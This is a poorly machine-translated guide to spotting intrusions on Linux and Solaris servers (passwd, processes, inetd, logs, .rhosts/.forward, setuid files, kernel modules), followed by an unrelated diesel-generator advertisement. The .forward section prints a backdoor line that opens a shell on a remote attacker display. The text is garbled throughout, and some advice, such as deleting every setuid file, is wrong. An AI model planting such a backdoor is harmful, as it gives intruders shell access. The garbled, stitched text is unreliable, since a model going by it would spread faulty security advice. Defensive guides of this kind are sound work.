How to judge whether your server has been hacked? It is not enough to rely on two hands, but both hands can also play some role. Let's take a look at some intrusion detection methods on UNIX systems, taking LINUX and solaris as examples. 1, check the system password file Start with an obvious look at the passwd file, ls –l /etc/passwd to see the date the file was modified. Check which privileged users are in the passwd file. Users with uid 0 in the system will be displayed. By the way, check if there is an empty password account in the system: 2, check the process to see if there are strange processes Focus on the process: Ps –aef | grep inetd Inetd is the daemon of the UNIX system. The normal inetd pid is relatively advanced. If you see a process like inetd –s /tmp/.xxx, focus on the content behind inetd –s. Under normal circumstances, the inetd service in the LINUX system does not have the -s parameter, and of course, inetd is not used to start a file; the solaris system is only inetd-s, and the inetd is not used to start a specific If you use the ps command to see that inetd has started a file and you haven't started it with inetd, it means that someone has invaded your system and started a simple backdoor with root privileges. Enter ps –aef to view the output, paying particular attention to processes that start with ./xxx. Once you find a different process, check the backdoor program left by the intruder, immediately run kill –9 pid to kill the process, then run ps –aef to see if the process is killed; once such a process kills The phenomenon of restarting later proves that the system has been placed with a script that automatically starts the program. At this time, you need to look carefully: find / -name program name - print, assuming that the system is really placed behind the door by the intruder, according to the directory where the program is found, you will find a lot of interesting stuff J The hidden process under UNIX is sometimes done by replacing the ps file. Checking this method involves checking the file integrity. We will discuss this method later. Next, follow the steps to find the intruder's file directory on the server. 3, check the system daemon Check the /etc/inetd.conf file and type: cat /etc/inetd.conf | grep –v “^#â€. The output is the remote service that your machine is running on. Generally, an intruder can create a backdoor by directly replacing the in.xxx program. For example, replacing in.telnetd with /bin/sh and then restarting the inetd service, all users who telnet to the server will not directly enter the username and password. Get a rootshell. 4, check the network connection and listening port Enter netstat -an to list all connected and monitored ports of the machine to see if there are any illegal connections. Enter netstat –rn to check whether the routing and gateway settings of this machine are correct. Enter ifconfig –a to see the NIC settings. 5, check the system log The command last | more looks at the history of all users who log in to the machine under normal conditions. But the last command relies on the syslog process, which has become an important target for intruder attacks. The intruder usually stops the syslog of the system, checks the status of the system syslog process, and determines whether the syslog was started normally. Because syslog is executed as root, if the syslog is found to have been illegally moved, it indicates that there is a major intrusion event. . Enter ls –al /var/log under linux Enter s –al /var/adm under solaris Check wtmp utmp, including the integrity and modification time of files such as messgae, which is also a way to manually erase the intrusion traces. 6, check the core file in the system Intrusion into the system by sending a malformed request to attack a server's service is a conventional intrusion method. This is the typical RPC attack. This method has a certain success rate, which means that it does not guarantee 100% successful intrusion into the system, and usually generates a core file in the corresponding directory of the server, globally finds the core file in the system, and enters find / -name core –exec Ls –l {} \; According to the directory where the core is located, query the core file to determine whether there is intrusion. 7, .rhosts and .forward These are two well-known backdoor files. If you want to check if your system is installed by the intruder, you can find these two files globally: Find / -name ".rhosts" –print Find / -name ".forward" –print Under a user's $HOME, it is very dangerous to include only two + numbers in the .rhosts file. If you have 513 ports on your system (rlogin port, the same as telnet), then anyone can use this. The user logs in to your system without any verification. Putting a command in a .forward file under Unix is ​​a common way to regain access. The .forward of a user $HOME may be set as follows: \username|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 –e /bin/sh" The variant of this method involves changing the system's mail alias file (usually located in /etc/aliases). Note that this is just a simple transformation. More advanced can run simple scripts from .forward to execute arbitrary commands on standard input. (A small part of the pre-processing). Using smrsh can effectively stop this backdoor (although if you can allow self-running elm's filter or procmail class program, there is probably a problem. Under Solaris system, if you run the following command: Ln -s /var/mail/luser ~/.forward Then set the vacation to be valid, then /var/mail/luser will be copied to ~/.forward, and "|/usr/bin/vacation me" will be appended. The old symlink will be moved to ~/.forward..BACKUP . It is also possible to delete these two files directly. 8, check system file integrity There are several ways to check the integrity of a file. Usually we query and compare files by entering the ls –l filename. This method is simple, but it still has some practicality. But if the ls files have been replaced, it is more troublesome. In Linux, you can use rpm –V `rpm –qf file name` to query whether the result of the national query is normal to judge whether the file is complete. There are many ways to use rpm to check the integrity of a file under Linux. I won't go into details here. You can get more formats by man rpm. In UNIX systems, /bin/login is a file that is often replaced by intruders as a backdoor. Next, let's talk about the login backdoor: In UNIX, the Login program is usually used to authenticate users to telnet. The intruder obtains the source code of the login and modifies it so that it checks the backdoor password first when comparing the input password with the stored password. If the user types in the backdoor password, it will ignore the password set by the administrator and let you drive straight in: this will allow the intruder to enter any account, even the root directory. Since the backdoor password is an access generated before the user actually logs in and is logged to utmp and wtmP, the intruder can log in to get the shell without exposing the account. After the administrator notices this backdoor, use the "strings" command to search the login program for text information. In many cases, the backdoor password will be revealed. The intruder will then start encrypting or changing the hidden password, invalidating the strings command. So many administrators use MD5 checksums to detect such backdoors. On the UNIX system, there is the md5sum command. Enter the md5sum file name to check the md5 signature of the file. It is used in the following format: md5sum –b reads the file in binary mode; md5sum –c reverse checks the MD5 signature; md5sum –t reads the file in text mode. As mentioned in the daemon process, the lines that are not commented out in the daemon configuration file inetd.conf should be carefully compared. For a simple example, if you open the telnet service, there will be a sentence in the daemon configuration file. :telnet stream tcp nowait root /usr/sbin/in.telnetd in.telnetd You can see that the file it uses is /usr/sbin/in.telnetd, check the integrity of the file, and the intruder often creates a backdoor for himself by replacing the service files allowed in the daemon. The /etc/crontab in the LINUX system is also a file that is often used by intruders. To check the integrity of the file, you can directly cat /etc/crontab, and read the file carefully to be used by other intruders to do other things. The method of directly using the process to start the backdoor without replacing the file such as login has a defect that once the system is restarted, the process is killed, so the backdoor must be started when the system is started. Usually check the file under /etc/rc.d to see if the system starts with a backdoor program; how is this method a bit like checking trojan under windows? Having said that, if you find a file with a property like this in a directory: -rwsr-xr-x 1 root root xxx .sh, this means that any user can get a rootshell by running this file after coming in. This is the setuid file. Run find –perm 4000 –print to globally find such files and then delete such files. 9, check the kernel level back door If your system is installed with such a back door, it is usually annoying, I often think, in this case or reinstall the system to calculate J, get down to business, first, check the system loaded module, in LINUX Use the lsmod command in the system and use the modinfo command to view it in the solaris system. What needs to be explained here is that the LINUX loaded modules installed by default are relatively few, usually the driver of the network card; there are many solaris, there is no other way, only one by one to analyze. After hardening the kernel, you should disable the insertion or removal of the module to protect the security of the system, otherwise the intruder will be able to replace the system call again. We can do this by replacing create_module() and delete_module(). In addition, the kernel should be hardened as early as possible to prevent system calls from being replaced by intruders. If the system is loaded with backdoor modules, but you can't see them in the module list /proc/module, it is possible to use the hack tool to remove the loaded modules. The famous knark toolkit has tools to remove the loaded modules. . In this case, you need to look up the /proc directory carefully, and judge the hidden and disguised processes based on the files and experience found. The Knark backdoor module is in the /proc/knark directory, although this directory may be hidden. 10. Defects in manual intrusion detection I have talked about some methods of manual intrusion detection, but these methods have certain defects, some even inevitable defects, which is why manual testing is the reason for "physical activity." Let's take a look at these defects first: 1) Manual intrusion detection can only be based on the host, which means that all intrusion detection work can only be done under the operating system, which is its inherent defect; basically all intrusions beyond the operating system can not be detected. Network-level intrusion, intrusion and attack on switches and routers, cannot be known as the operating system of the server; information has been sent out from the host. If it is intercepted in the transmitted medium, the operating system of the host is never indifferent. . 2) Manual intrusion detection requires proficiency in the operating system, and the vulnerability database data should be refreshed quickly; be a hacker while doing a network management. It can be said that the accumulation of experience can never keep up with the update of vulnerabilities in the world, and it is difficult to ensure that the system is not invaded by new vulnerabilities. 3) Manual intrusion detection is only a matter of “arguing thingsâ€. According to a certain situation, the intrusion event is judged, and corresponding corresponding and preventive measures are made. Instead, the description of the attack event can be made according to the intruder's detection behavior, and the event level is defined. Prevent the next intrusion into the system without hindering the normal operation of the system. 4) Some vulnerabilities on the host can be discovered through manual intrusion detection, and corresponding security measures are taken. But it can't avoid a phenomenon: it is impossible to prevent two intruders from exploiting the same vulnerability to attack the host, that is, unable to judge the attack mode to cut off the intrusion. 5) In summary, manual intrusion detection behavior is only a temporary solution for system security, but most of it relies on the skills and experience of administrators to enhance the security of the system. No, it is impossible to form a real security system. Although it is better than nothing, it can detect and track certain intrusions, but it is difficult to catch the trail if you encounter an intruder who is also proficient in the system. 11. Comparison of intrusion detection systems Building a true security system requires an intrusion detection system—IDS. An excellent intrusion detection system, complemented by the skills and experience of the system administrator, can form a true security system, effectively judge and cut off intrusions, and truly protect the host and data. People sometimes think that ISS's realsecure is an excellent intrusion detection system. In fact, realsecure has certain flaws, not to mention its false positives, false negatives and misstatements. First of all, it is an English software, using and It is difficult to get acquainted with it. And because it is a foreigner's software, many hacks have in-depth research on realsecure, have discovered some of its vulnerabilities, and even inherent vulnerabilities, I have tested some of the attacks can make realsecure. Moreover, realsecure is also set up on the server operating system, the operating system stops working, and it also stops working. In other words, it is very simple, the target of the attacker attack is often the realsecure itself. Imagine, if your system relies on an intrusion detection system, and the intrusion detection system is taken up by an attacker, then your system will open the door and let it go, the consequences will be disastrous.
SWT Diesel Generator assembly by diesel engine, alternator, radiator, controller, base frame;
. World Famous diesel engine brand: SWT Ordered
. World famous AC alternator brand: Stamford, Leroy Somer, Mecc Alte, Marathon, Faraday, SWT
. World famous genset controller brand: Deepsea, ComAp, Deif, SmartGen,
. Good Quality Cooling Radiator
. Start Battery system
Swt Genset,Swt Generator,Swt Diesel Generator,Generator, Swt Engine Guangdong Superwatt Power Equipment Co., Ltd , https://www.swtgenset.com
